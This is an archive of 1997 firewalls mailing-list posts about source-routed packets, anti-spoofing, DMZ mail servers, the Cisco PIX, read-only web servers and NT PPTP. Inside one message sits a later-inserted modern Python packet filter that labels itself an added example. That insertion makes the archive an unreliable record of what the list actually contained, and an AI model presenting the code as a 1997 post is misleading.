From firewalls-owner Sat Jan 4 17:23:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10353 for firewalls-outgoing; Sat, 4 Jan 1997 17:02:02 -0800 (PST) Received: from mail.u-net.net (mail.u-net.net [194.119.128.80]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA10346 for ; Sat, 4 Jan 1997 17:01:50 -0800 (PST) Received: from mint.u-net.com ([193.119.188.245]) by mail.u-net.net with ESMTP id <40977-7806>; Sun, 5 Jan 1997 00:57:34 +0000 From: "Mr. S Armitage" To: Subject: Slow down Date: Wed, 1 Jan 1997 14:09:59 -0000 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-Id: <97Jan5.005734+0000_gmt.40977-7806+30@mail.u-net.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi, your service is great, but I'm getting that much mail I don't have time to read it. I already have at least fifty unread firewalls digests. So would it be possible to remove my name from the mailing list and give me time to catch up?

Thanks
armo@mint.u-net.com
----------

From firewalls-owner Sat Jan 4 17:29:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10273 for firewalls-outgoing; Sat, 4 Jan 1997 17:00:50 -0800 (PST) Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA10264 for ; Sat, 4 Jan 1997 17:00:41 -0800 (PST) Received: (qmail 13766 invoked from smtpd); 5 Jan 1997 01:00:16 -0000 Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 5 Jan 1997 01:00:16 -0000 Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id TAA21833; Sat, 4 Jan 1997 19:00:16 -0600 Received: by sonic.nmti.com; id AA02172; Sat, 4 Jan 1997 19:00:10 -0600 From: peter@baileynm.com (Peter da Silva) Message-Id: <9701050100.AA02172@sonic.nmti.com.nmti.com> Subject: Re: Re[2]: NT NAT To: ckn@findata.se Date: Sat, 4 Jan 1997 19:00:09 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Carl Karlsson" at Jan 5, 97 01:16:33 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Do I need to care about
> source routed packets if my upstream provider has everything configured
> as they should?

Yes. Don't depend on a third party maintaining a configuration correctly for the proper operation of your firewall.

> If I am using for example Linux, would it be enough to
> configure the linux kernel to drop source routed packets?

I don't know. It's a sysctl option in FreeBSD.
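The kernel and router settings discussed in this thread are only named, not shown, so here is the filter logic they implement, as an added example (not code from anyone on this list): it parses a raw IPv4 header, drops datagrams carrying a loose or strict source-route option, and, on the external link, drops datagrams whose source address falls in the 192.168.0.0/16 range Carl asked about (the anti-spoofing rule Bernd recommends later in the thread). The interface labels and the sample datagrams are constructed for the example.

```python
"""Ingress checks for a packet filter, as an added example for this thread.

  1. Drop IPv4 datagrams carrying a Loose (LSRR, type 131) or Strict
     (SSRR, type 137) Source Route option, on any interface.
  2. On the external interface, drop datagrams whose source address is
     internal (192.168.0.0/16 here); they can only be spoofed.
The interface names and sample datagrams below are constructed for the example.
"""
import ipaddress
import struct

INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16")]  # assumed site range

IPOPT_EOL = 0     # end of option list
IPOPT_NOP = 1     # no-operation (single byte, no length field)
IPOPT_LSRR = 131  # loose source and record route (RFC 791)
IPOPT_SSRR = 137  # strict source and record route (RFC 791)


def parse_ipv4(datagram: bytes) -> dict:
    """Return src, dst, protocol and the list of option type codes."""
    if len(datagram) < 20:
        raise ValueError("truncated IPv4 header")
    vihl, _tos, _tlen, _id, _frag, _ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", datagram[:20])
    version, ihl = vihl >> 4, (vihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(datagram) < ihl:
        raise ValueError("bad IPv4 header")
    options = []
    i = 20
    while i < ihl:  # walk the option area between the fixed header and IHL
        opt_type = datagram[i]
        if opt_type == IPOPT_EOL:
            break
        if opt_type == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= ihl:
            raise ValueError("option without length byte")
        opt_len = datagram[i + 1]
        if opt_len < 2 or i + opt_len > ihl:
            raise ValueError("bad option length")
        options.append(opt_type)
        i += opt_len
    return {"src": ipaddress.ip_address(src), "dst": ipaddress.ip_address(dst),
            "proto": proto, "options": options}


def ingress_verdict(datagram: bytes, interface: str) -> str:
    """'accept' or 'drop: <reason>' for a datagram received on `interface`."""
    try:
        hdr = parse_ipv4(datagram)
    except ValueError as exc:
        return f"drop: {exc}"  # malformed headers are never forwarded
    if IPOPT_LSRR in hdr["options"] or IPOPT_SSRR in hdr["options"]:
        return "drop: source-routed packet"
    if interface == "external" and any(hdr["src"] in n for n in INTERNAL_NETS):
        return "drop: internal source address on external interface"
    return "accept"


def build_ipv4(src: str, dst: str, options: bytes = b"") -> bytes:
    """Build a minimal IPv4 header (no payload) for the constructed samples."""
    options += b"\x00" * (-len(options) % 4)  # pad the option area to 32-bit words
    ihl = 5 + len(options) // 4
    fixed = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, 20 + len(options),
                        0, 0, 64, 6, 0,
                        ipaddress.ip_address(src).packed,
                        ipaddress.ip_address(dst).packed)
    return fixed + options


# Constructed samples: an ordinary packet, one with an LSRR option naming an
# internal hop, and one arriving from outside with an internal source address.
PLAIN = build_ipv4("198.51.100.7", "203.0.113.10")
LSRR_OPT = bytes([IPOPT_LSRR, 7, 4]) + ipaddress.ip_address("192.168.1.1").packed
SOURCE_ROUTED = build_ipv4("198.51.100.7", "203.0.113.10", LSRR_OPT)
SPOOFED = build_ipv4("192.168.1.5", "192.168.1.1")

if __name__ == "__main__":
    for name, pkt in (("plain", PLAIN), ("lsrr", SOURCE_ROUTED), ("spoofed", SPOOFED)):
        print(f"{name:8s} external -> {ingress_verdict(pkt, 'external')}")
```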
From firewalls-owner Sat Jan 4 17:36:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA09845 for firewalls-outgoing; Sat, 4 Jan 1997 16:55:21 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA09815 for ; Sat, 4 Jan 1997 16:55:10 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id QAA25824; Sat, 4 Jan 1997 16:54:10 -0800 (PST) Message-Id: <3.0.32.19970104195407.006c3e84@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 04 Jan 1997 19:54:09 -0500 To: Carl Karlsson From: Paul Ferguson Subject: Re: Re[2]: NT NAT Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Apologies for the terseness. :-)

I certainly wouldn't rely on my upstream service provider to block source-routed traffic; normally, they don't care. In fact, they generally support it to troubleshoot routing problems [i.e. the traceroute -g option].

I can't speak to kernel or OS modifications (since I'm an old router jockey anyway), but source-routed IP packets can be easily dropped on a cisco router by adding the global parameter:

    no ip source-route

to the router configuration.

- paul

At 01:16 AM 1/5/97 +0100, Carl Karlsson wrote:
>> >Source routed packets.
>>
>> Which are easily stopped.
>
>You guys have a cool terse way of discussing interesting things. :) I was
>thinking that source routed packets were the answer to my question, and I
>was also believing that they could be stopped. Do I need to care about
>source routed packets if my upstream provider has everything configured
>as they should? If I am using for example Linux, would it be enough to
>configure the linux kernel to drop source routed packets? To configure the
>linux firewall to ignore localnet packets from the external link?
>Many questions.. I'll accept an RTFM answer if someone also tells me WTFM
>is. :)
>

--
Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com c i s c o S y s t e m s

From firewalls-owner Sat Jan 4 17:44:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10785 for firewalls-outgoing; Sat, 4 Jan 1997 17:09:42 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA10778 for ; Sat, 4 Jan 1997 17:09:30 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vgh4Y-0004FgC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 02:08:22 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Sun, 5 Jan 97 02:08 MET Received: by lina id m0vggy9-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 02:01:45 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: Re[2]: NT NAT To: ckn@findata.se Date: Sun, 5 Jan 1997 02:01:44 +0100 (MET) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Carl Karlsson" at Jan 5, 97 01:16:33 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello,

> Do I need to care about
> source routed packets if my upstream provider has everything configured
> as they should?

Ask your upstream provider; how should we know if he is filtering source routed packets? You can drop them at your router which links you to the outside world. Use firewall rules or settings like "drop source routed frames" with Linux.

> If I am using for example Linux, would it be enough to
> configure the linux kernel to drop source routed packets? To configure the
> linux firewall to ignore localnet packets from the external link?

Both. And ignore packets from your internal net as the source on external interfaces. And ignore packets with an internal address as source on the external interface, and so on. This will protect you from IP spoofing and will block most simple attacks.

Greetings
Bernd

From firewalls-owner Sat Jan 4 19:34:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA18678 for firewalls-outgoing; Sat, 4 Jan 1997 19:13:04 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA18671 for ; Sat, 4 Jan 1997 19:12:57 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id VAA00477; Sat, 4 Jan 1997 21:14:21 -0600 Date: Sat, 4 Jan 1997 21:06:27 -0600 (CST) From: Ron DuFresne To: Peter da Silva cc: ckn@findata.se, firewalls@GreatCircle.COM Subject: Re: Re[2]: NT NAT In-Reply-To: <9701050100.AA02172@sonic.nmti.com.nmti.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At least the 2.0.x kernels and newer have this as a config option when you rebuild the kernel...

Later,

Ron DuFresne

On Sat, 4 Jan 1997, Peter da Silva wrote:
> > Do I need to care about
> > source routed packets if my upstream provider has everything configured
> > as they should?
>
> Yes. Don't depend on a third party maintaining a configuration correctly
> for the proper operation of your firewall.
>
> > If I am using for example Linux, would it be enough to
> > configure the linux kernel to drop source routed packets?
>
> I don't know. It's a sysctl option in FreeBSD.
>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Sat Jan 4 19:47:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA18798 for firewalls-outgoing; Sat, 4 Jan 1997 19:14:32 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA18791 for ; Sat, 4 Jan 1997 19:14:19 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id VAA00489; Sat, 4 Jan 1997 21:15:49 -0600 Date: Sat, 4 Jan 1997 21:07:59 -0600 (CST) From: Ron DuFresne To: Bernd Eckenfels cc: ckn@findata.se, firewalls@GreatCircle.COM Subject: Re: Re[2]: NT NAT In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

And for the 2.0.x kernels there is a patch to help control SYN floods...

Later,

Ron DuFresne

On Sun, 5 Jan 1997, Bernd Eckenfels wrote:
> Hello,
>
> > Do I need to care about
> > source routed packets if my upstream provider has everything configured
> > as they should?
>
> Ask your upstream provider; how should we know if he is filtering source
> routed packets? You can drop them at your router which links you to the
> outside world. Use firewall rules or settings like "drop source routed
> frames" with Linux.
>
> > If I am using for example Linux, would it be enough to
> > configure the linux kernel to drop source routed packets? To configure the
> > linux firewall to ignore localnet packets from the external link?
>
> Both. And ignore packets from your internal net as the source on
> external interfaces. And ignore packets with an internal address as source on
> the external interface, and so on. This will protect you from IP spoofing and
> will block most simple attacks.
>
> Greetings
> Bernd
>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Sat Jan 4 21:29:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA24739 for firewalls-outgoing; Sat, 4 Jan 1997 21:20:29 -0800 (PST) Received: from exon.massart.mass.edu ([134.241.139.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA24725 for ; Sat, 4 Jan 1997 21:20:21 -0800 (PST) Received: (from paonia@localhost) by exon.massart.mass.edu (8.7.5/8.7.3) id AAA15351; Sun, 5 Jan 1997 00:19:56 -0500 From: Paonia Ezrine Message-Id: <199701050519.AAA15351@exon.massart.mass.edu> Subject: which mta 4 dmz To: firewalls@greatcircle.com Date: Sun, 5 Jan 1997 00:19:56 -0500 (EST) Cc: mick@janis.massart.edu, mbrodsky@phx.com (Michael Brodsky) Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I am trying to decide which MTA to use on the external mail machine. I am thinking about these:
1. sendmail 8.8.4
2. zmailer 2.9.44.1
3. qmail 0.95
4. exim

What are people using? What would you suggest? Pros/cons?
thanks
paonia

From firewalls-owner Sun Jan 5 16:44:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24259 for firewalls-outgoing; Sun, 5 Jan 1997 16:26:12 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24219 for ; Sun, 5 Jan 1997 16:25:49 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vh2sS-0004IVC (Debian Smail-3.2 1996-Jul-4 #2); Mon, 6 Jan 1997 01:25:20 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Mon, 6 Jan 97 01:25 MET Received: by lina id m0vgvHH-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 17:18:27 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: which mta 4 dmz To: paonia@exon.massart.mass.edu (Paonia Ezrine) Date: Sun, 5 Jan 1997 17:18:27 +0100 (MET) Cc: firewalls@greatcircle.com, mick@janis.massart.edu, mbrodsky@phx.com In-Reply-To: <199701050519.AAA15351@exon.massart.mass.edu> from "Paonia Ezrine" at Jan 5, 97 00:19:56 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello,

> I am trying to decide which MTA to use on the external mail machine. I am
> thinking about these
> 1. sendmail 8.8.4
Medium performance
-Full of bugs, complicated sendmail.cf.
+Good for rewriting headers, well known. Could be run as non-privileged user.

> 2. zmailer 2.9.44.1
Memory consuming
-Complicated to configure
+Lots of features. IMHO unstable. Not sure about security.

> 3. qmail 0.95
Network consuming
-No bang path support, uncommon
+Fast, secure, easy to set up, useful features

> 4. exim
Hmm.. don't have much info about that
-No bang path support
+Fast and useful features

5. smail
Medium performance
-Complicated in high traffic situations
+Easy to set up. Not many bugs are known. Can run as unprivileged relay.

6. smap/smapd
Mail proxy only.
-Needs another MTA behind itself. Does not do much header sanity checking.
+Small program (which doesn't do much :)

7. smtpd/forwd
Mail proxy only.
-Needs another MTA.
+Small program which does fairly good header data checks.

Personally I would either use smail or qmail, depending on the tasks which need to be carried out.

Greetings
Bernd

PS: for smap and smtpd see http://www.inka.de/sites/lina/freefire-l/

-- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy

From firewalls-owner Sun Jan 5 20:29:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA04687 for firewalls-outgoing; Sun, 5 Jan 1997 20:16:53 -0800 (PST) Received: from email.acsinc.net ([206.156.73.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA04677 for ; Sun, 5 Jan 1997 20:16:42 -0800 (PST) Received: from keith.acsinc.net (arisiasoft.acsinc.net [206.156.73.34]) by email.acsinc.net (Netscape Mail Server v1.1) with ESMTP id AAA63 for ; Sun, 5 Jan 1997 23:16:41 -0500 From: keithstevens@acsinc.net (Keith Stevens) To: Subject: Cisco PIX Date: Sun, 5 Jan 1997 23:13:35 -0500 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-ID: <19970106041640725.AAA63@keith.acsinc.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Is there a bastion host / proxy server that out-performs Cisco's PIX in throughput? Security? Ease of implementation? From my limited perspective as a newbie, the Cisco PIX in combination with a good screening router is a very good firewall.
Not to be a wise guy, I'm seriously asking: with this technology available, is there ever a reason to build one from scratch? I might be able to do it cheaper - but if it takes a couple of weeks or a month to do, it might cost more.

I'm not in any way affiliated with Cisco.

Keith Stevens
keith@acsinc.net

From firewalls-owner Sun Jan 5 23:06:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA09504 for firewalls-outgoing; Sun, 5 Jan 1997 21:52:20 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09470 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:51:49 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA17474 for ; Tue, 31 Dec 1996 13:01:58 -0800 (PST) From: uskanbye@ibmmail.com Message-Id: <199612312101.NAA17474@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 3767; Tue, 31 Dec 96 16:01:20 EST Date: Tue, 31 Dec 1996 16:00:41 EST To: firewalls@greatcircle.com X-Sender-Info: Mitchell Ummel CSP CCP, KDHE Network Manager Office of Information Systems, Tech Services Section MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I don't agree with the premise that a CD-ROM based WWW server is a viable option. Unless your web site is very static (no databases, no HTML generation, no frequent updates?), this would be cumbersome indeed, and still NO guarantee against hacking. Case in point... unless your DNS server is also "CD-ROM based" as well (a silly proposition), a hacker can always point your WWW server domain name to another "hacked" IP address. Physical read-only storage may offer SOME protection, but is still not hackproof (not to mention the probable performance penalty you'd pay for optical).
----------------WWW.INK.ORG\PUBLIC\KDHE-------------------
--------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT---------
----------Mills Bldg Suite 501 Topeka, KS 66612-----------
---------Phone (913) 296-5643 FAX (913) 296-8943----------

*** Forwarding note from I5004693--IBMMAIL 12/31/96 15:42 ***

Date: Tue, 31 Dec 1996 11:41:27 -0800 From: Mark Johnson To: Dale Drew CC: Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked

Dale Drew wrote:
>
> I don't see how CDROM provides significant advantages on a WEB server
> "graffiti" attack.
>
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT (or the user that owns
> the http process), and the system has some form of (or access to)
> writable media available.
>
> The attacker just repoints the httpd root tree to the writable media (eg;
> "/tmp") and away from the CDROM.
>
> http://www.security.mci.net
> ===============================================================
> Dale Drew MCI Telecommunications
> Sr. Manager internetMCI Security Engineering
> Voice: 703/715-7058 Internet: ddrew@mci.net
> Fax: 703/715-7066 MCIMAIL: Dale_Drew/644-3335
>
> At 11:57 PM 12/30/96 -0500, Michael Idengren wrote:
> >I don't know about the rest of you but I agree with the idea of putting a
> >webserver on a CD-ROM. I think the government can afford to write a new
> >CD every time they need to update someone's email address anyways :)
> >
> >Mike Idengren | MEISTER
> >---------------------------------+----------------------------------
> >Center for Information Technology| Alachua Free-Net IRC Administrator
> >Stetson University | WorldWide Free-Net IRC Network Coordinator
>

I have not set one up yet (planned for July), but I believe you can have a totally CDROM machine, at least using Novell or NT. Bootable CDROMs and all data on CDROM, so you would not have any writable media. Can anyone confirm or deny my thoughts?
Mark -- Mark Johnson Network Project Manager St. Mary's Regional Med Ctr mark@hercules.reno.nv.us ---- End of mail text Additional SMTP headers from original mail item follow: Received: from relay1.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Tue, 31 Dec 96 15:43:03 EST Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbwna15264; Tue, 31 Dec 1996 15:42:24 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-9604 17-1) id LAA12757 for firewalls-outgoing; Tue, 31 Dec 1996 11:35:24 -0800 (PST) Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA12750 for ; Tue, 31 Dec 1996 11:35:17 -0800 (PST) Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbas in.com (8.8.4/8.7.3) with SMTP id LAA14508; Tue, 31 Dec 1996 11:34:30 -0800 (PS T) Message-ID: <32C96C67.7D78@hercules.reno.nv.us> X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 References: <3.0.32.19961231124626.007717e4@166.45.1.38> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Sun Jan 5 23:18:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA11469 for firewalls-outgoing; Sun, 5 Jan 1997 22:16:45 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09528 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:52:32 -0800 (PST) Received: from odin.cmp.ilstu.edu (odin.cmp.ilstu.edu [138.87.1.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA17297 for ; Wed, 1 Jan 1997 14:43:08 -0800 (PST) From: mrwilhe@odin.cmp.ilstu.edu Received: from hawkins-13.isbe.state.il.us by odin.cmp.ilstu.edu (AIX 4.1/UCB 5.64/4.03) id AA15722; Wed, 1 Jan 1997 16:42:12 -0600 Message-Id: 
<1.5.4.32.19970101224653.008ff9d0@odin.cmp.ilstu.edu> X-Sender: mrwilhe@odin.cmp.ilstu.edu X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 01 Jan 1997 16:46:53 -0600 To: firewalls@GreatCircle.COM Subject: airfhack--secure/hacked web server Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On the idea of the RAM mem--it would have to be something special--only changed by physical means (rebooting?)--one could not inflict something of non-physical forces to change the RAM. (Sorta like a BIOS holding a passwd--you can clear the password by taking the chip out -- yes, I know there are ways around this, but something similar for the RAM mem/disk would suffice to keep it from being hacked.)

Another statement that was brought up was that CD-ROM or other write-once media or a physical write lock on the hard drive (HD prob more practical) would being able to change the page often-- my statement I made at first was meant for only sites that don't change their pages often -- not pages such as www.news.com. I don't believe that the main pages of the CIA/DIA/FBI/NSA/NI and other sites that hold stats..... change their pages that often.

fsh

<<>>

The following are some of the major points made on this subject (sorry if I left out some).

"Seriously: why not just put it on a separate disk which is mounted
> read-only? If you want to go further, you could buy a suitable harddisk
> which can be write-locked by hardware. regards:jamie"

"The Web server would have to be based on all write once media -- from the
> Operating systems and all other aspects, otherwise the attacker would just
> redirect the homepage contents to a hard drive.

Doesn't matter, I could just launch a server that redirected you to a site with the content mirrored and altered, or serve the pages out of memory, or off of RAM disk." From: "Paul D. Robertson"

"A CD-ROM-based web server would be fine if you created web pages, pressed a CD, and then never again expected to add/delete/modify the content. But this is The Real World (tm)." Mark Johnson

"Not to disagree with anything Paul has said, because I don't, but the original premise was government web sites, not high volume web sites. How often does the Air Force's web pages need to change? Not too often, I would wager; they don't *need* re-visits, they don't have advertising (at least I would expect they don't, I haven't checked actually), they are there just to provide some mostly static information. Given that, I think there is merit to a write-once media approach. But not, as Paul and others point out, as a general solution." Dave Kinchlea

[from Michael Idengren:]
> I don't know about the rest of you but I agree with the idea of putting a
> webserver on a CD-ROM.

[from Thomas Leitner:]
> why not just put it on a separate disk which is mounted
> read-only?

[from Dale Drew:]
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT...

Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step.

I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though.

Happy new year (2 minutes to go...),
Norm

1. My comment was partially meant as a joke; it's horribly impractical for ISPs and Universities and such to require operator intervention every time a webpage needs to be updated. Such a level of paranoia *might* only be appropriate for government agencies and authoritative advanced research sites.
From: Michael Idengren

From firewalls-owner Mon Jan 6 00:14:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA17243 for firewalls-outgoing; Sun, 5 Jan 1997 23:56:58 -0800 (PST) Received: from imc.eyron.com (mail.eyron.com [192.116.223.180]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA17212 for ; Sun, 5 Jan 1997 23:56:39 -0800 (PST) Received: by imc.eyron.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFBB7.CC993440@imc.eyron.com>; Mon, 6 Jan 1997 09:55:51 +0200 Message-ID: From: Dov Sharon To: "'firewalls@greatcircle.com'" Subject: Windows NT PPTP Date: Mon, 6 Jan 1997 09:56:24 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

Does anybody know how secure the PPTP service provided with Windows NT 4.0 is for establishing a VPN across the internet? Are there any known security holes when using this service?

Thanks,
Dov Sharon
System Admin
Eyron Ltd.
